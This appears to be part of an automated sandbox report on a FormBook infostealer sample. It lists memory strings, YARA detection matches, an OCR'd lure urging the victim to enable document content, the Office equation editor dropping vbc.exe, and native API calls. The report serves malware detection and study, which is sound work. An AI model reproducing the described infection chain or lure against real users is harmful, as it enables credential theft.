          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2193378270.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000008.00000000.2205349635.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2187410622.0000000004CD0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2380626235.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193378270.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2200558819.00000000082FD000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2200558819.00000000082FD000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193050323.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: document is protected 16 - 17 18 19 20 21 Open the document in If this document was 22 Micr
          Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 25 26 27 28 29 30 " " " " " 31 0 0 0 0 ~ - 32
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004181C0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00418270 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004182F0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004181BA NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041826A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008700C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00870048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00870078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008707AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008710D0 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00870060 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008701D4 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0087010C NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00871148 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086F8CC NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00871930 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086F938 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FAB8 NtQueryValueKey,
